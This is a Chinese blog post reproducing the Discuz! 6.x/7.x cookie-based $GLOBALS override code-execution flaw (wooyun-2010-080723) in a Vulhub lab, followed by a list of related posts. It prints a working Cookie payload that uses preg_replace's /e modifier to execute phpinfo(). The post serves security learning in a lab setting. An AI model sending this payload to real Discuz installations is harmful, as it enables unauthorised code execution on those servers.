Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现

最新推荐文章于 2024-05-04 21:00:00 发布
最新推荐文章于 2024-05-04 21:00:00 发布
阅读量327 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_python321/article/details/130707659
版权

Discuz-命令执行(wooyun-2010-080723)漏洞复现

漏洞描述:

Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

漏洞影响版本:

Discuz! 6.x/7.x 全局变量防御绕过漏洞

漏洞复现:

1:使用vulhub中靶场启动环境

2:访问http://ip:8080/install

3:我同意---下一步  数据库服务器填db 其他自行填写

 

4:安装成功直接访问 http://ip:8080

5:访问默认板块中任意帖子抓包如下

 

6:替换请求数据包中的cookie字段如下
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

 7:成功命令执行

3ize0f
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
025-PY爬虫-wooyun_public-master.zip
07-03
py爬虫,源代码
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
discuz wooyun-2010-080723
weixin_37639863的博客
02-17 1833
漏洞复现-Discuz-命令执行wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php
vulhubDiscuz-命令执行 wooyun-2010-080723
weixin_42884199的博客
12-06 1741
一、启动靶机 docker-compose build docker-compose up -d 二、安装 URL: http://192.168.150.146:8080/install 安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子 将Cookie修改为下面,点击放包 三、构造payload 请求: GET
vulhub靶场】Tomcat中间件漏洞复现
M372109150的博客
05-04 1765
本文主要是对tomcat中间件相关漏洞复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞
漏洞复现-discuz-wooyun-命令执行vulfocus/discuz-wooyun_2010_080723
10-14 1154
discuz-wooyun-命令执行】Cookie中命令执行
Discuz 7.x6.x 全局变量防御绕过导致代码执行wooyun-2010-080723
黑白的博客
12-06 532
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
vulfocus——discuz命令执行(wooyun-2010-080723
m0_62063669的博客
09-15 1334
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
wooyun_public-master.zip
08-23
标题中的"wooyun_public-master.zip"表明这是一个与Wooyun相关的开源项目,而Wooyun,也称为“乌云”,曾是中国知名的网络安全社区。这个压缩包可能是该社区公开的一部分资源或者研究资料,以"master"命名,通常代表...
py爬虫wooyun-public-master
04-20
### py爬虫wooyun-public-master #### 知识点一:Py爬虫与Wooyun_public-master的关系 - **Py爬虫**:通常指的是使用Python语言编写的网络爬虫程序。这类程序能够自动地抓取互联网上的数据,并进行处理和分析。 - ...
python爬虫案例wooyun-public-master.zip
最新发布
05-31
在"python爬虫案例wooyun-public-master.zip"中,我们可以深入探讨Python爬虫技术的相关知识点,包括基础概念、常用库、网络请求、HTML解析、数据存储等方面。 1. **基础概念** - **爬虫**: 一种自动浏览并提取...
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1544
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)
易编橙 · 终身成长社群,相遇已是上上签!
10-22 716
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1323
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
vulhub漏洞复现八_discuz
weixin_44193247的博客
01-09 1335
vulhub漏洞复现练习篇
vulhub靶场漏洞复现——Discuz
pigzlfa的博客
09-21 307
Board(简称 Discuz!,中国国家版权局著作权登记号 2006SR11895)是北京康盛新创科技有限责任公司推出的一套通用的社区建站系统,站长可以不需要任何编程基础,通过简单的安装和设置,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的网站。Discuz!的基础架构采用世界上最流行的web编程组合PHP+MySQL实现,是一个经过完善设计,适用于各种服务器环境的高效建站解决方案。
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
搭建并攻破discuz靶场复现)并且盗取数据库
cainiao17441898的博客
06-30 2795
环境:Centos7,Win10 搭建环境: 一个新的Centos7虚拟机,需要搭建一个LAMP环境。 命令:yum -y install httpd mariadb-server mariadb php php-mysql(下载环境) 开启服务器和数据库 命令:systemctl start httpd,systemctl start mariadb 设置mysql数据库用户名密码:mysql -u root -p 123456 注意:这里我之前设置过密码,但是我忘了,淦! 解决办法: 漏洞概述: 这漏洞
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值